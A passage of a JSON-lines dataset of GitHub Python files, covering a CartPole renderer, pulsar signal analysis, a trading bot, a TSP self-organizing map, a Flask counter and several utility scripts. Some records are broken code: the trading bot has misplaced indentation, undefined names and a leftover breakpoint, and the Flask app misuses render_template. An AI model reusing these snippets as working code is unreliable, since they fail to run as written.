(pt[0]-(pad+ang_arrow_len)*od[0]+(arrowwidth/2)*pd[0],\r\n pt[1]-(pad+ang_arrow_len)*od[1]+(arrowwidth/2)*pd[1]),\r\n (pt[0]-(pad+ang_arrow_len)*od[0]-(arrowwidth/2)*pd[0],\r\n pt[1]-(pad+ang_arrow_len)*od[1]-(arrowwidth/2)*pd[1]),\r\n (pt[0]-pad*od[0]-(arrowwidth/2)*pd[0],\r\n pt[1]-pad*od[1]-(arrowwidth/2)*pd[1])]\r\n self.ang_arrow_tip.v = [(pt[0]-(pad+ang_arrow_len)*od[0]+(tipwidth/2)*pd[0],\r\n pt[1]-(pad+ang_arrow_len)*od[1]+(tipwidth/2)*pd[1]),\r\n (pt[0]-(pad+ang_arrow_len)*od[0]-(tipwidth/2)*pd[0],\r\n pt[1]-(pad+ang_arrow_len)*od[1]-(tipwidth/2)*pd[1]),\r\n (pt[0]-(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[0],\r\n pt[1]-(pad+ang_arrow_len+np.sqrt(3)*tipwidth/2)*od[1])]\r\n\r\n # Edit the pole polygon vertex\r\n pole = self._pole_geom\r\n l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\r\n pole.v = [(l, b), (l, t), (r, t), (r, b)]\r\n\r\n\r\n cartx = x[0] * scale + screen_width / 2.0 # MIDDLE OF CART\r\n self.carttrans.set_translation(cartx, carty)\r\n self.poletrans.set_rotation(-x[2])\r\n\r\n if self.steps_beyond_done is not None:\r\n pole.set_color(.8, .2, .2)\r\n self.cart.set_color(.3, 0.1, 0.1)\r\n\r\n return self.viewer.render(return_rgb_array=mode == 'rgb_array')\r\n\r\n def close(self):\r\n if self.viewer:\r\n self.viewer.close()\r\n self.viewer = None\r\n","repo_name":"aVariengien/self-organized-control","sub_path":"code/SelfOrgControl/CustomCartPoleEnv.py","file_name":"CustomCartPoleEnv.py","file_ext":"py","file_size_in_byte":17837,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"68"} +{"seq_id":"6503135960","text":"import numpy as np\nimport psrchive as psr\nimport matplotlib.pyplot as plt\nimport os\n\ncwd = os.getcwd()\nos.chdir('/fred/oz005/users/akulkarn/J0437-4715/J0437-4715_meerkat_19May_22/Processed/Frequency_Appended_all_withK/Corrected_DM/4pul_Integrated/')\n\nar=psr.Archive_load(\"pulse_8984616844_Lband.paz.XP.it\")\nar.set_dispersion_measure(2.64161357856353) ## Dispersion measure obtained from timing analysis of 8 sec inegrated data\nar.dedisperse()\n\nar.pscrunch() ## Doing analysis on Total intensity\npol=0\ndata=ar.get_data()\ndim=data.shape\n##################################################################################################################################################\n## The current data does not seem to be bandpass calibrated and hence the bandpas is not flattended. \nbaseline=np.ndarray([dim[0],dim[2]])\n ## Calculating baseline as a function of frequency from data######\nfor k in range(dim[2]):\n for i in range(dim[0]):\n baseline[i,k]=np.mean(data[i,0,k,800:1020])\n\n## Removing baseline form data\ndata_baseline_removed=np.ndarray([dim[0],dim[2],dim[3]])\nfor i in range(dim[0]):\n for j in range(dim[2]):\n data_baseline_removed[i,j,:]=np.add(np.subtract(data[i,0,j,:],baseline[i,j]),1)\n\n##################################################################################################################################################\n###### Defining the matrix of Energy component [Subint,Freq]\nEner_main_comp=np.ndarray([dim[0],dim[2]])\n\nfor i in range(dim[0]):\n for j in range(dim[2]):\n Ener_main_comp[i,j]=np.divide(np.sum(data[i,pol,j,300:420]-np.mean(data[i,pol,j,800:1020])),np.multiply(np.sqrt(120),np.std(data[i,pol,j,800:1020])))\n\n##########Calculating Pearson Correlation coefficient across frequency #############\nR_pear_Ener_main=np.ndarray([dim[2],dim[2]])\n\nR_pear_Ener_main=np.corrcoef(Ener_main_comp,rowvar=False)\n\n## Defining matrix of Energy componets for noise [Subint,Freq]\nEner_main_comp_noise=np.ndarray([dim[0],dim[2]])\n\nfor i in range(dim[0]):\n for j in range(dim[2]):\n Ener_main_comp_noise[i,j]=np.divide(np.sum(data[i,pol,j,650:770]-np.mean(data[i,pol,j,800:1020])),np.multiply(np.sqrt(120),np.std(data[i,pol,j,800:1020])))\n####################################################################################################################################################3\n####### Plotting results############\nFig, Axs = plt.subplots(nrows=3,ncols=3)\n\nfor r in range(3):\n for j in range(3):\n Axs[r,j].scatter(Ener_main_comp[:,10],Ener_main_comp[:,6*r+j+3],label='10,'+str(6*r+j+3))\n Axs[r,j].legend()\n\n\nFig1, Axs1 = plt.subplots(nrows=3,ncols=3)\n\nfor r in range(3):\n for j in range(3):\n Axs1[r,j].scatter(Ener_main_comp_noise[:,10],Ener_main_comp_noise[:,6*r+j+3],label='10,'+str(6*r+j+3))\n Axs1[r,j].legend()\n\n\n#############################################################################################\n############################################################################################\n#\n#\n# CALCULATING MODULATION INDEX\n#\n#\n#############################################################################################\n\nmodIndex=np.ndarray([dim[2],dim[3]])\nfor i in range(dim[2]):\n for j in range(dim[3]):\n modIndex[i,j]=np.divide(np.sqrt(np.var(data_baseline_removed[:,i,j])-np.mean(np.var(data_baseline_removed[:,i,800:1020],axis=1))),np.mean(data_baseline_removed[:,i,j]))\n\n\nplt.show()\n\nos.chdir(cwd)","repo_name":"Atharva1994/Project_Jitter","sub_path":"old_codes/mk/Pulse_energy_corr.py","file_name":"Pulse_energy_corr.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15522956185","text":"def solution():\n def integers():\n num = 1\n while True:\n yield num\n num += 1\n\n def halves():\n for i in integers():\n yield i / 2\n\n def take(n, seq):\n new_list = []\n times = 0\n for v in seq:\n new_list.append(v)\n if times == n - 1:\n break\n times += 1\n\n return new_list\n\n return take, halves, integers\n\n\ntake = solution()[0]\nhalves = solution()[1]\nprint(take(5, halves()))\n","repo_name":"Pavel-Petkov03/SoftuniHomeworks","sub_path":"Programming_OOP_with_Python/Exercises/iterator_and_generator_exercise/take_halves.py","file_name":"take_halves.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"19085562594","text":"import json\nfrom typing_extensions import Self\n\n\nclass Pnl():\n\n def __init__(self, client):\n \"\"\"\n client is used to issue orders\n \"\"\"\n self.client = client\n\n def process_candle(self, candle_msg:str):\n \"\"\"This function is called when a new candle_msg is received.\n Candle message is a string of the form:\n {'symbol_key' : {'c': [174.3], 'h': [174.3], 'l': [174.19], 'o': [174.19], 's': 'ok', 't': [1643670000], 'v': [1888]}\n\n Note that there are list, so you can have multiple candles in one message.\n \"\"\"\n if self.client.money > 300 : \n self.client.buy('AAPL', 1)\n breakpoint()\n \ncandle_dict = json.loads(candle_msg) \nfor k, v in candle_dict.items():\n if 'AAPL' == k :\n Self.update_aapl_mean(v)\n\n print(f\"Moyenne :{self.total_AAPL/self.count_AAPL}\")\n self.sell_if_needed(k, v)\ndef update_aapl_mean(self, v): \n self.count_AAPL += 1\n self.total_AAPL += v['c']\n\ndef sell_if_needed(self, k, v):\n if v['c'] < self.previous_price : \n self.client.sell(k,1)\n elif self.client.money > v['c']: \n self.client.buy(k,1)\n\n print(finnhub_client.technical_indicator(\n symbol=\"AAPL\",\n resolution=\"D\",\n _from=1583098857,\n to=1584308457,\n indicator=\"rsi\",\n indicator_fields={\"timeperiod\": 3},\n )\n)\n\n","repo_name":"Pradich95/Robot-trading-PNL","sub_path":"trading_bot.py","file_name":"trading_bot.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38159201152","text":"\"\"\" \"\"\"\n\nfrom numbers import Real\nfrom typing import ClassVar\n\nimport numpy as np\n\nfrom qcrew.helpers import logger\nfrom qcrew.helpers.parametrizer import Parametrized\nfrom qcrew.helpers.yamlizer import Yamlizable\n\nBASE_PULSE_AMP = 0.2 # in V\nCLOCK_CYCLE = 4 # in ns\n\n\nclass Pulse(Parametrized, Yamlizable):\n \"\"\" \"\"\"\n\n _parameters: ClassVar[set[str]] = {\"length\", \"ampx\"}\n\n def __init__(\n self,\n *, # enforce keyword-only arguments\n length: int = 400,\n ampx: float = 1.0,\n integration_weights=None,\n ) -> None:\n \"\"\" \"\"\"\n self.length: int = length\n self.ampx: float = ampx\n\n self.is_readout_pulse: bool = False\n self.integration_weights = None\n if integration_weights is not None:\n self.integration_weights = integration_weights\n self.is_readout_pulse = True\n self._update_integration_weights(\"length\")\n\n self.has_mix_waveforms: bool = True # qcrew's default use case\n\n def __repr__(self) -> str:\n \"\"\" \"\"\"\n return f\"{type(self).__name__}[{self.type_}]{self.parameters}\"\n\n def __call__(self, **parameters: Real) -> None:\n \"\"\" \"\"\"\n for name, value in parameters.items():\n is_attribute = hasattr(self, name)\n if is_attribute and value is not None:\n setattr(self, name, value)\n if self.is_readout_pulse:\n self._update_integration_weights(name)\n elif not is_attribute:\n cls_name = type(self).__name__\n logger.warning(f\"Parameter '{name}' must be an attribute of {cls_name}\")\n logger.success(f\"Set {self}\")\n\n def _update_integration_weights(self, key: str) -> None:\n \"\"\" \"\"\"\n do_update = key == \"length\" and self.integration_weights.is_pinned\n if do_update:\n new_iw_len = int(self.length / CLOCK_CYCLE)\n self.integration_weights.length = new_iw_len\n logger.debug(f\"Set integration weights len = {new_iw_len}\")\n\n @property # waveform amplitude samples getter\n def samples(self) -> tuple[np.ndarray]:\n \"\"\" \"\"\"\n logger.error(\"Abstract method must be implemented by subclass(es)\")\n raise NotImplementedError(\"Can't call `samples` on Pulse instance\")\n\n @property # pulse type_ getter for building QM config\n def type_(self) -> str:\n \"\"\" \"\"\"\n return \"measurement\" if self.is_readout_pulse else \"control\"\n","repo_name":"qcrew-lab/qcrew","sub_path":"qcrew/control/pulses/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"19840672494","text":"#!/usr/bin/env python3\n# coding: utf-8\n#\n# author: https://github.com/vladiscripts\n#\nimport requests\nfrom urllib.parse import quote\nfrom lxml import etree\nimport re\nimport pywikibot\nimport vladi_commons\n\n\ndef normalization_pagename(t):\n\t\"\"\" Первая буква в верхний регистр, ' ' > '_' \"\"\"\n\tt = t.strip()\n\treturn t[0:1].upper() + t[1:].replace(' ', '_')\n\n# wikipages_filename = r'..\\temp\\AWBfile.txt'\n# text = vladi_commons.file_readtext(wikipages_filename)\nexclude_namespaces = r'(Special|Служебная|Участник|User|У|Обсуждение[ _]участника|ОУ|Википедия|ВП|Обсуждение[ _]Википедии|Обсуждение):'\nclose_tpls = re.compile(r'\\{\\{([Оо]тпатрулировано|[Сс]делано|[Dd]one|[Оо]тклонено)\\s*(?:\\|.*?)?\\}\\}')\nsections_re = re.compile(r\"
        [\\n\\s]*\\{\\{выступ\\s*\\|\\s*\\[?\\s*''+([^']+)\", re.DOTALL)\nlink_re = re.compile(r'\\s*(?)\\s*(\\[\\[(?!%s).*?\\]\\])' % exclude_namespaces)\nlink_title_re = re.compile(r'\\[\\[([^]|]+).*?\\]\\]')\nlink_just_re = re.compile(r'\\s*(\\[\\[(?!%s).*?\\]\\])' % exclude_namespaces)\ntag_li_re = re.compile(r'^[*#](.*)$', re.MULTILINE)\nheader_re = re.compile(r'^==+([^=]+)==+$', re.MULTILINE)\ntextend = re.compile(r'\\n*$')\n\nre_akut = re.compile(r'\\{\\{[Аа]кут3?\\}\\}')\nre_notw = re.compile(r'[^\\w -]')\n\npage_tsds_list = []\n\nsite = pywikibot.Site('ru', 'wikisource')\noffset_of_volumes = [17, 2, 2, 4]\nvolume = 4\nscanpageN = 5\nwhile scanpageN <= 800:\n\t# for workpage in workpages:\n\tworkpage = 'Страница:Толковый словарь. Том 4 (Даль 1909).djvu/' + str(scanpageN)\n\tpage = pywikibot.Page(site, workpage)\n\ttext = page.get()\n\n\tfirst_tsds = True\n\n\t# нечётный номер страницы\n\t# if number % 2:\n\t# \tpb = pb + 1\n\t# return pb / 2 + offset[2]\n\n\tbookpageN = str((scanpageN - offset_of_volumes[volume - 1]) * 2 - 1) \\\n\t\t\t\t+ '-' + \\\n\t\t\t\tstr((scanpageN - offset_of_volumes[volume - 1]) * 2)\n\n\tsections = sections_re.findall(text)\n\tfor section in sections:\n\t\tword_DO = section[1]\n\t\tword_DO = re_akut.sub('', word_DO)\n\t\tword_DO = re_notw.sub('', word_DO)\n\n\t\tif first_tsds:\n\t\t\tmarker_showpageN = '\\t|3'\n\t\t\tfirst_tsds = None\n\t\telse:\n\t\t\tmarker_showpageN = ''\n\n\t\ttsds = '# {{tsds|%s\\t|%s\\t|%s%s}}' % (section[0], word_DO, str(bookpageN), marker_showpageN)\n\n\t\tpage_tsds_list.append(tsds)\n\n\tscanpageN += 1\n\n\ntext = '\\n'.join(page_tsds_list)\n\npass\n\nvladi_commons.file_savetext('tsds3-' + str(volume) + '.txt', text)\npass\n","repo_name":"vladiscripts/4wiki","sub_path":"tsd3-slovnik.py","file_name":"tsd3-slovnik.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12841790087","text":"import importlib\nfrom urllib.parse import urlparse\n\nimport grpc\nimport web3\nfrom snet.sdk.payment_strategies.payment_staregy import PaymentStrategy\nfrom snet.snet_cli.utils.utils import RESOURCES_PATH, add_to_path\nfrom snet.sdk.root_certificate import root_certificate\n\nclass FreeCallPaymentStrategy(PaymentStrategy):\n\n def is_free_call_available(self, service_client):\n try:\n org_id, service_id, group_id, daemon_endpoint = service_client.get_service_details()\n email, token_for_free_call, token_expiry_date_block = service_client.get_free_call_config()\n\n if not token_for_free_call:\n return False\n\n signature, current_block_number = self.generate_signature(service_client)\n with add_to_path(str(RESOURCES_PATH.joinpath(\"proto\"))):\n state_service_pb2 = importlib.import_module(\"state_service_pb2\")\n\n with add_to_path(str(RESOURCES_PATH.joinpath(\"proto\"))):\n state_service_pb2_grpc = importlib.import_module(\"state_service_pb2_grpc\")\n\n request = state_service_pb2.FreeCallStateRequest()\n request.user_id = email\n request.token_for_free_call = token_for_free_call\n request.token_expiry_date_block = token_expiry_date_block\n request.signature = signature\n request.current_block = current_block_number\n\n endpoint_object = urlparse(daemon_endpoint)\n if endpoint_object.port is not None:\n channel_endpoint = endpoint_object.hostname + \":\" + str(endpoint_object.port)\n else:\n channel_endpoint = endpoint_object.hostname\n\n if endpoint_object.scheme == \"http\":\n channel = grpc.insecure_channel(channel_endpoint)\n elif endpoint_object.scheme == \"https\":\n channel = grpc.secure_channel(channel_endpoint, grpc.ssl_channel_credentials(root_certificates=root_certificate))\n else:\n raise ValueError('Unsupported scheme in service metadata (\"{}\")'.format(endpoint_object.scheme))\n\n stub = state_service_pb2_grpc.FreeCallStateServiceStub(channel)\n response = stub.GetFreeCallsAvailable(request)\n if response.free_calls_available > 0:\n return True\n return False\n except Exception as e:\n return False\n\n def get_payment_metadata(self, service_client):\n email, token_for_free_call, token_expiry_date_block = service_client.get_free_call_config()\n signature, current_block_number = self.generate_signature(service_client)\n metadata = [(\"snet-free-call-auth-token-bin\", token_for_free_call),\n (\"snet-free-call-token-expiry-block\", str(token_expiry_date_block)),\n (\"snet-payment-type\", \"free-call\"),\n (\"snet-free-call-user-id\", email),\n (\"snet-current-block-number\", str(current_block_number)),\n (\"snet-payment-channel-signature-bin\", signature)]\n\n return metadata\n\n def select_channel(self, service_client):\n pass\n\n def generate_signature(self, service_client):\n org_id, service_id, group_id, daemon_endpoint = service_client.get_service_details()\n email, token_for_free_call, token_expiry_date_block = service_client.get_free_call_config()\n\n if token_expiry_date_block == 0 or len(email) == 0 or len(token_for_free_call) == 0:\n raise Exception(\n \"You are using default 'FreeCallPaymentStrategy' to use this strategy you need to pass \"\n \"'free_call_auth_token-bin','email','free-call-token-expiry-block' in config\")\n\n current_block_number = service_client.get_current_block_number()\n\n message = web3.Web3.soliditySha3(\n [\"string\", \"string\", \"string\", \"string\", \"string\", \"uint256\", \"bytes32\"],\n [\"__prefix_free_trial\", email, org_id, service_id, group_id, current_block_number,\n token_for_free_call]\n )\n return service_client.generate_signature(message), current_block_number\n","repo_name":"singnet/snet-cli","sub_path":"packages/sdk/snet/sdk/payment_strategies/freecall_payment_strategy.py","file_name":"freecall_payment_strategy.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"68"} +{"seq_id":"70902082456","text":"import os\r\nfrom nsf_query import get_awards_csv\r\nfrom datetime import datetime\r\n\r\ndefault = 1976\r\ncurrent = datetime.now().year # grep all awards till current year\r\n\r\n# Program list to be downloaded.\r\nprograms = {\r\n \"Applied Mathematics\" : default,\r\n \"Computational Mathematics\" : 1984,\r\n \"Analysis\" : 1991,\r\n \"Probability\" : default,\r\n \"Statistics\" : default,\r\n \"Algebra and Number Theory\" : default,\r\n \"Topology\" : default,\r\n \"Mathematical Biology\" : 2001,\r\n \"Geometric Analysis\" : default,\r\n \"Combinatorics\" : 2006,\r\n \"Foundations\" : default\r\n}\r\n\r\n\r\nfor program, start_year in programs.items():\r\n for year in range(start_year, current + 1):\r\n print( \"downloading \" + program + \" \" + str(year) )\r\n\r\n cur_dir = os.path.dirname(__file__)\r\n prog_dir = program.replace(\" \", \"-\")\r\n \r\n target_file = os.path.join(os.path.join(cur_dir, prog_dir), \"Awards-\" + program.replace(\" \", \"-\") +\"-\" + str(year) + \".csv\")\r\n\r\n if os.path.exists(target_file) and year < current:\r\n print( \"file exists for \" + program + \" \" + str(year) +\"\\n\" )\r\n else:\r\n out = get_awards_csv(program, year)\r\n if out == 0:\r\n print( \"update needed, the download is completed for \" + program + \" \" + str(year) +\"\\n\" )\r\n elif out == 1:\r\n print( \"update is not needed, the download is completed for \" + program + \" \" + str(year) +\"\\n\")\r\n elif out == 2:\r\n print(\" creating new file, the download is completed for \" + program + \" \" + str(year) +\"\\n\")\r\n else:\r\n print(\"downloading issue, awards not downloaded.\")\r\n\r\n\r\n# clean the directory\r\nif os.path.exists(\"Awards.csv\"):\r\n os.remove(\"Awards.csv\")","repo_name":"lowrank/NSF-DMS-awards","sub_path":"nsf_awards.py","file_name":"nsf_awards.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4470660658","text":"import pyautogui as pg\nimport time\n\nREGION_PARTY = (1570,135,171,147)\nREGION_LIFE = (1599,200)\nREGION_GRANSIO= (1447,140,144,139)\n\n\ndef Sio ():\n\n while True:\n if pg.pixelMatchesColor(1597, 171, (96, 191, 96)): #cor verde\n pg.press('F7')\n time.sleep(0.05)\n pg.press('F7')\n print('Usando Sio... vida no verde')\n pg.sleep(1)\n\n if pg.pixelMatchesColor(1597, 171, (191, 191, 0)): #cor amarela\n if pg.pixelMatchesColor(1652,171,(75,75,75)) and pg.locateOnScreen('imgs/region_gransio.png', confidence=0.9, region=REGION_GRANSIO):\n pg.press('F8')\n time.sleep(0.05)\n pg.press('F8')\n print('Usando GRANSIO... vida no amarelo')\n pg.sleep(1)\n else:\n pg.press('F7')\n time.sleep(0.05)\n pg.press('F7')\n print('Usando sio... vida no amarelo')\n pg.sleep(1)\n\n if pg.pixelMatchesColor(1597,171,(191,48,48)) or pg.pixelMatchesColor(1597,171,(95,0,0)): #cor vemelha ou preta\n if pg.locateOnScreen('imgs/region_gransio.png', confidence=0.9, region= REGION_GRANSIO):\n pg.press('F8')\n time.sleep(0.05)\n pg.press('F8')\n print('Usando GRANSIO... vida no vermelho ou preto ')\n pg.sleep(1)\n else:\n pg.press('F7')\n time.sleep(0.05)\n pg.press('F7')\n pg.sleep(1)\n print('Usando Sio... vida no vermelho ou preto ')\n \nprint('Começando...')\n#pg.displayMousePosition()\nSio()","repo_name":"CaioMascarenhas/BOT_TIBIA","sub_path":"sio.py","file_name":"sio.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20176771796","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nfrom __future__ import division\n\nfrom .t_bithumb import T_Bithumb\n\n\nclass T_Bithumb_BCH(T_Bithumb):\n \"\"\"\n bch:\n ./venv/bin/python -m quant.cli -mBithumb_BCH_KRW,Bitfinex_BCH_BTC,Bithumb_BTC_KRW -o=T_Bithumb_BCH -f=bithumb_bch -v\n\n 目前的限制:\n bithumb: bch_krw=0.01\n bitfinex: bch_btc: 0.02\n bithumb: btc_krw=0.001\n\n \"\"\"\n\n def __init__(self):\n base_pair = \"Bithumb_BCH_KRW\"\n pair_1 = \"Bitfinex_BCH_BTC\"\n pair_2 = \"Bithumb_BTC_KRW\"\n\n kwargs = {\n 'monitor_only': False,\n 'precision': 2,\n 'fee_base': 0.0015,\n 'fee_pair1': 0.002,\n 'fee_pair2': 0.0015,\n 'min_stock_base': 0.01,\n 'min_stock_pair1': 0.02,\n 'min_stock_pair2': 0.001,\n 'max_trade_amount': 1,\n 'min_trade_amount': 0.02\n }\n super(T_Bithumb_BCH, self).__init__(base_pair, pair_1, pair_2, **kwargs)\n","repo_name":"doubleDragon/QuantBot","sub_path":"quant/observers/t_bithumb_bch.py","file_name":"t_bithumb_bch.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"32796861072","text":"from pycaishen.pycaishenstorage import PycaishenStorage\nfrom pycaishen.pycaishendata import PycaishenData\n\nfrom pycaishen.user_programs.user_programs_settings import Configurer\n\nimport datetime\n\n\ndef chunks(list, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n\n if n > 1:\n for i in range(0, len(list), n):\n yield list[i:i + n]\n elif n == 1:\n for i in range(0, len(list)):\n yield list[i:i + 1]\n\n\nclass BloombergIntraday(object):\n\n def get_bloomberg_data(self, bloomberg_symbols_tickers, start_date =\"01 01 2000\", finish_date = None, adjusted = True ):\n\n if finish_date == None:\n finish_date = datetime.date.today() - datetime.timedelta(days=1)\n\n data = PycaishenData()\n datasource = \"bloomberg\"\n\n if adjusted == False:\n options_type = ['parameter']\n options_fields = [\"UseDPDF\"]\n options_values = [\"N\"]\n\n data.set_datasource_options(datasource, options_type=options_type, options_fields=options_fields,\n options_values=options_values)\n\n data.set_request(datasource_name=datasource, data_source_fields=None,\n category=None, data_source_tickers=bloomberg_symbols_tickers,\n start_date=start_date, finish_date=finish_date, freq=\"minute\", timeseries_type=True,\n )\n print((\"* getting data for %d symbols .....\" % (len(bloomberg_symbols_tickers))))\n return data.fetch_request()\n\n\n\n def store_bloomberg_data(self, list_dataframes,append= False, library = Configurer.LIB_BLOOMBERG_MINUTE_ADJUSTED):\n\n print(\"* Storing data in the database\")\n storage = PycaishenStorage(\"arctic\")\n\n i = 0\n for dataframe in list_dataframes:\n symbol = self._get_symbol_from_dataframe(dataframe)\n storage.write(symbol,dataframe,library,append)\n # print \"%s EOD data stored successfully \" % (symbol)\n i = i + 1\n print((\"=> %d / %d EOD data stored successfully \" % (i,len(list_dataframes))))\n\n\n def _get_symbol_from_dataframe(self,dataframe):\n symbol = dataframe.columns[0].split('.')[0]\n return symbol\n\n\nif __name__ == '__main__':\n\n from pycaishen.user_programs.Bloomberg.Bloomberg_all_symbols import bloomberg_all_symbol\n\n symbols = bloomberg_all_symbol()\n\n from pycaishen.user_programs.Bloomberg.Bloomberg_currencies import build_currencies_need\n # symbols = build_currencies_need()\n\n # symbols=[\"ADH MC Equity\",\"BCE MC Equity\"]\n end_date = \"30 01 2017\"\n Intraday = BloombergIntraday()\n n = 500\n for symbols in chunks(symbols,n) :\n print(\"working on : \")\n print(symbols)\n data = Intraday.get_bloomberg_data(bloomberg_symbols_tickers=symbols,finish_date=end_date)\n # data = EOD.get_bloomberg_EOD(bloomberg_symbols_tickers=symbols)\n Intraday.store_bloomberg_data(data)\n\n # storage = PycaishenStorage(\"arctic\")\n # lib = Configurer.LIB_BLOOMBERG_MINUTE_ADJUSTED\n # symbols = storage.list_symbols(lib)\n # for symbol in symbols:\n # print storage.read(symbol,lib)\n","repo_name":"spyamine/pycaishen3","sub_path":"pycaishen/user_programs/Bloomberg/Bloomberg_minute.py","file_name":"Bloomberg_minute.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15244621830","text":"# Author : Ondřej Maceška \n# Date : 12.7.2022\n# Task : https://www.algoexpert.io/questions/min-height-bst\n\n\n# O(n) time, O(n) space where n is the length of the array\ndef min_heght_bst(array, previous_node = None):\n \"\"\" Constructs a Binary Search Tree with minimum depth from the given array\n (Recursive)\n \n Args:\n array (int[]) : a given array \n previous_node (BST) : a previous_node of BST \n\n Returns:\n BST : the root of the tree\n \"\"\"\n middle_index = len(array) // 2\n middle_value = array[middle_index]\n root = None\n if(not previous_node):\n previous_node = BST(middle_value)\n root = previous_node\n else:\n previous_node = previous_node.insert(middle_value)\n \n left_array = array[:middle_index]\n if(left_array):\n min_heght_bst(left_array, previous_node)\n\n right_array = array[middle_index + 1:]\n if(right_array):\n min_heght_bst(right_array, previous_node)\n\n return root\n \nclass BST:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n def insert(self, value):\n if value < self.value:\n if self.left is None:\n self.left = BST(value)\n return self.left\n else:\n self.left.insert(value)\n else:\n if self.right is None:\n self.right = BST(value)\n return self.right\n else:\n self.right.insert(value)\n","repo_name":"Jasasul2/Algoexpert","sub_path":"Medium/minHeightBST.py","file_name":"minHeightBST.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32303517757","text":"from sys import argv\n\nimport numpy as np, os\n\nfrom benchmarks.tsp.utils import read_dataset, normalize_2d\nfrom som.neuron import get_neighborhood, get_route\nfrom som.distance import select_closest, euclidean_distance, route_distance\nfrom benchmarks.tsp.plot import plot_network, plot_route\n\ndef main():\n\n\n problem = read_dataset(\"uy734\")\n\n route = som(problem, 200000)\n\n problem = problem[\"node_coords\"][route]\n\n distance = route_distance(problem)\n\n print('Route found of length {}'.format(distance))\n\n\ndef som(problem, iterations, learning_rate=0.8, rnd=np.random):\n \"\"\"Solve the TSP using a Self-Organizing Map.\"\"\"\n\n # The population size is 8 times the number of cities\n n = problem[\"num_nodes\"] * 8\n cities = normalize_2d(problem[\"node_coords\"])\n\n # Generate an adequate network of neurons:\n network = rnd.rand(n, 2)*2-1\n network[:, 1] = np.sqrt(1-(network[:, 0])**2) * (-1)**np.random.randint(2, size=network.shape[0])\n network = network/2+0.5\n # A = np.random.randint(2, size=network.shape[0])\n # A = (-1)**np.random.randint(2, size=network.shape[0])\n # A = network[:,0]**2 + network[:,1]**2\n print('Network of {} neurons created. Starting the iterations:'.format(n))\n\n plot_network(cities, network, name='diagrams/{}.png'.format(\"0000o\"))\n\n for i in range(iterations):\n if not i % 100:\n print('\\t> Iteration {}/{}'.format(i, iterations), end=\"\\r\")\n # Choose a random city\n city = cities[rnd.randint(cities.shape[0]), :]\n winner_idx = select_closest(network, city) # winner_idx in the network\n # Generate a filter that applies changes to the winner's gaussian\n gaussian = get_neighborhood(winner_idx, n//10, network.shape[0])\n # Update the network's weights (closer to the city)\n network += gaussian[:,np.newaxis] * learning_rate * (city - network)\n # Decay the variables\n learning_rate = learning_rate * 0.99997\n n = n * 0.9997\n\n # Check for plotting interval\n if not i % 100:\n plot_network(cities, network, name='diagrams/{:05d}.png'.format(i))\n\n # Check if any parameter has completely decayed.\n if n < 1:\n print('Radius has completely decayed, finishing execution',\n 'at {} iterations'.format(i))\n break\n if learning_rate < 0.001:\n print('Learning rate has completely decayed, finishing execution',\n 'at {} iterations'.format(i))\n break\n else:\n print('Completed {} iterations.'.format(iterations))\n\n plot_network(cities, network, name='diagrams/final.png')\n\n route = get_route(cities, network)\n plot_route(cities, route, 'diagrams/route.png')\n return route\n\nif __name__ == '__main__':\n main()\n","repo_name":"xiaolongzheng/-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10186041787","text":"from flask import Flask, render_template, request, redirect, session\napp = Flask(__name__)\napp.secret_key = \"SSSHHHH secret key\"\n@app.route('/')\ndef app_home():\n\tsession['count'] = 0\n\tsession['page_visited'] = 0\n\treturn redirect('/count')\n@app.route('/count')\ndef count():\n\tsession['count'] += 1\n\tsession['page_visited'] += 1\n\tprint(session['count'])\n\treturn render_template(request,'index.html')\n@app.route('/add2')\ndef add_2():\n\tsession['count'] += 1\n\tsession['page_visited'] = session['page_visited']\n\treturn redirect('/count')\n@app.route('/count_increment', methods=['POST'])\ndef countIncrement():\n\tc = request.form['count']\n\tprint(c*40)\n\tprint(session['count'])\n\tsession['page_visited'] = session['page_visited']\n\tsession['count'] = session['count'] + int(c) - 1\n\treturn redirect('/count')\n@app.route('/destroy_session')\ndef destroy_session():\n\tprint('count')\n\tif 'count' in session:\n\t\tprint('key exists!')\n\telse:\n\t\tprint(\"no\"*50)\n\t# session.clear()\t\t# clears all keys\n\tsession.pop('count')\t\t# clears a specific key\n\treturn redirect('/')\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"oohasri/python","sub_path":"flask/flask_fundamentals/counter/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 